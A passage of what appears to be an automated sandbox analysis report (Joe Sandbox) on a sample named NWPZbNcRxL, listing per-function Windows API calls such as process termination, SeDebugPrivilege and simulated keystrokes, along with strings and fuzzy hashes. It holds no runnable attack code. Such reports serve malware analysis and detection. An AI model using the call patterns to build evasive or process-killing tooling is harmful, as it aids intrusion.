                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4090791747-0
                                                                                                                            • Opcode ID: abe9d5c313801cc5938ba73559baaf4c2735bc0ff7045e70745b4aa9fc5dbeef
                                                                                                                            • Instruction ID: 5bdf312a89191673b26e1b3495d4326cea6d1d3d82b47a64d03290515fe5a470
                                                                                                                            • Opcode Fuzzy Hash: abe9d5c313801cc5938ba73559baaf4c2735bc0ff7045e70745b4aa9fc5dbeef
                                                                                                                            • Instruction Fuzzy Hash: 52E1A1316043009FDB14EF24C891B6EBBE1EF85318F14856DF8999B2A2CB31DD46EB56
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                                                                              • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                                                                              • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C74D40
                                                                                                                            • _wcscmp.LIBCMT ref: 00C74D5A
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C74D75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 793581249-0
                                                                                                                            • Opcode ID: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                                                                            • Instruction ID: a920c7d70c417c241e3ebb956274dfb9d747d9332de474b482d90dc8a63a34d9
                                                                                                                            • Opcode Fuzzy Hash: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                                                                            • Instruction Fuzzy Hash: FD5151B20083859BC724EBA0D8819DFB3ECAF85350F00492EF699D3151EF75E689D766
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C986FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                                                                            • Instruction ID: a22b11572af4400c54b53032f060f357014da11fe0f95dd9ca5330b92f49fb1c
                                                                                                                            • Opcode Fuzzy Hash: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                                                                            • Instruction Fuzzy Hash: 96518130500244FEDF209B65CC8DFAD7BA5AB06760F604116FA61EB1E1CF71EA98DB54
                                                                                                                            APIs
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C4C2F7
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4C319
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C4C331
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C4C34F
                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C4C370
                                                                                                                            • DestroyIcon.USER32(00000000), ref: 00C4C37F
                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4C39C
                                                                                                                            • DestroyIcon.USER32(?), ref: 00C4C3AB
                                                                                                                              • Part of subcall function 00C9A4AF: DeleteObject.GDI32(00000000), ref: 00C9A4E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2819616528-0
                                                                                                                            • Opcode ID: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                                                                            • Instruction ID: 63a5edead006c99a48be93fd3a4e8435794c35f2c990d039f8177e1b35e2954e
                                                                                                                            • Opcode Fuzzy Hash: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                                                                            • Instruction Fuzzy Hash: 42516774A00209AFDB24DF65CC85FAE7BA5FB19310F104529F912D72A0D7B0EDA1EB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6A84C
                                                                                                                              • Part of subcall function 00C6A82C: GetCurrentThreadId.KERNEL32 ref: 00C6A853
                                                                                                                              • Part of subcall function 00C6A82C: AttachThreadInput.USER32(00000000,?,00C69683,?,00000001), ref: 00C6A85A
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C6968E
                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C696AB
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C696AE
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696B7
                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C696D5
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696D8
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696E1
                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C696F8
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2014098862-0
                                                                                                                            • Opcode ID: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                                                                            • Instruction ID: f720ba76d77f656217f760b63142db45f969a56ec34eee8ef064b659c168c6d3
                                                                                                                            • Opcode Fuzzy Hash: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                                                                            • Instruction Fuzzy Hash: 57118EB1950618BEF6206B61DC8DF6E7A2DEB4C751F11042AF244AB0A1C9F26C529AE4
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C6853C,00000B00,?,?), ref: 00C6892A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68931
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68946
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C6853C,00000B00,?,?), ref: 00C6894E
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68951
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68961
                                                                                                                            • GetCurrentProcess.KERNEL32(00C6853C,00000000,?,00C6853C,00000B00,?,?), ref: 00C68969
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C6896C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00C68992,00000000,00000000,00000000), ref: 00C68986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1957940570-0
                                                                                                                            • Opcode ID: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                                                                            • Instruction ID: 6830be31c0d04a1e5f4f698ca0d5a44eae29cc5416253e662bdca98f6120db82
                                                                                                                            • Opcode Fuzzy Hash: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                                                                            • Instruction Fuzzy Hash: 9701BBB5240308FFEB10ABA5DC4DF6F3BACEB89711F508426FA05DB1A1CA709801CB64
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                            • API String ID: 0-572801152
                                                                                                                            • Opcode ID: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                                                                            • Instruction ID: 4def5d12bc6b349c5e5a78e9411fb5f4655c250803dd4f096d86307f2a999d3e
                                                                                                                            • Opcode Fuzzy Hash: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                                                                            • Instruction Fuzzy Hash: 55C1A371A002199FDF10EF98D884BBEB7F5FB48318F188469E915E7280E771AE45CB94
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                            • API String ID: 2862541840-625585964
                                                                                                                            • Opcode ID: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                                                                            • Instruction ID: 5fcad8f2e6a539a6aafbd2ab5b08b6ac8ec52204cb406d72847a59e0b172a6e1
                                                                                                                            • Opcode Fuzzy Hash: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                                                                            • Instruction Fuzzy Hash: 5191BF71A00219ABDF20EFA5C848FAFB7B8EF45718F14811DF515AB290D7709A45CFA4
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                                                                              • Part of subcall function 00C6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                                                                              • Part of subcall function 00C6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                                                                              • Part of subcall function 00C6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C89806
                                                                                                                            • _memset.LIBCMT ref: 00C89813
                                                                                                                            • _memset.LIBCMT ref: 00C89956
                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C89982
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00C8998D
                                                                                                                            Strings
                                                                                                                            • NULL Pointer assignment, xrefs: 00C899DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                            • API String ID: 1300414916-2785691316
                                                                                                                            • Opcode ID: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                                                                            • Instruction ID: e283f0b4ae65ca5ca8902388a9a5f6132ab9cb10487b4979480b6e9ef31e5b87
                                                                                                                            • Opcode Fuzzy Hash: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                                                                            • Instruction Fuzzy Hash: 63915971D00229EBDB10EFA5DC84EEEBBB9EF09314F10411AF419A7281DB719A45DFA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C96E24
                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C96E38
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C96E52
                                                                                                                            • _wcscat.LIBCMT ref: 00C96EAD
                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C96EC4
                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C96EF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                                                            • String ID: SysListView32
                                                                                                                            • API String ID: 307300125-78025650
                                                                                                                            • Opcode ID: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                                                                            • Instruction ID: 8c0a68de841b752239e52dc5b8a5f3fb40a0a7d5ba1db87c17ae3fc457474c98
                                                                                                                            • Opcode Fuzzy Hash: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                                                                            • Instruction Fuzzy Hash: F041A171A00348ABDF219F64CC89BEE77F8EF08350F10042AF594E71D1D6719E858B60
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
                                                                                                                              • Part of subcall function 00C73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
                                                                                                                              • Part of subcall function 00C73C55: CloseHandle.KERNEL32(00000000), ref: 00C73D52
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9A4
                                                                                                                            • GetLastError.KERNEL32 ref: 00C8E9B7
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9E6
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C8EA63
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C8EA6E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C8EAA3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                            • Opcode ID: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                                                                            • Instruction ID: 76eaab010390adab8b063e2d09c79454b2245d74a366a3a57ecdfef51493e97b
                                                                                                                            • Opcode Fuzzy Hash: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                                                                            • Instruction Fuzzy Hash: DB41CD31200200AFDB24EF24CCA6FAEBBA5BF41714F14841DF9069B2D2CB74E945EB95
                                                                                                                            APIs
                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C73033
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoad
                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                            • Opcode ID: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                                                                            • Instruction ID: 07f2233d92cb7ae3d358c5e3ebe4846cb5e2a6b899ea46439260cd84e7f5a591
                                                                                                                            • Opcode Fuzzy Hash: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                                                                            • Instruction Fuzzy Hash: 98113A313483C6BEEB249A95DC83EAF779CDF15360F20802EF908A6181DBB05F4476A0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C74312
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C74319
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7432F
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C74336
                                                                                                                            • _wprintf.LIBCMT ref: 00C7435C
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7437A
                                                                                                                            Strings
                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C74357
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                            • API String ID: 3648134473-3128320259
                                                                                                                            • Opcode ID: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                                                                            • Instruction ID: 61eb342e70d170672b4b4fe05f074d439cf747c05a5c8b2b945028e70993c84b
                                                                                                                            • Opcode Fuzzy Hash: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                                                                            • Instruction Fuzzy Hash: 81014FF2900208BFE71197A0DD8DFFA776CDB08301F0005AAB749E6051EA749E864B71
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C9D47C
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C9D49C
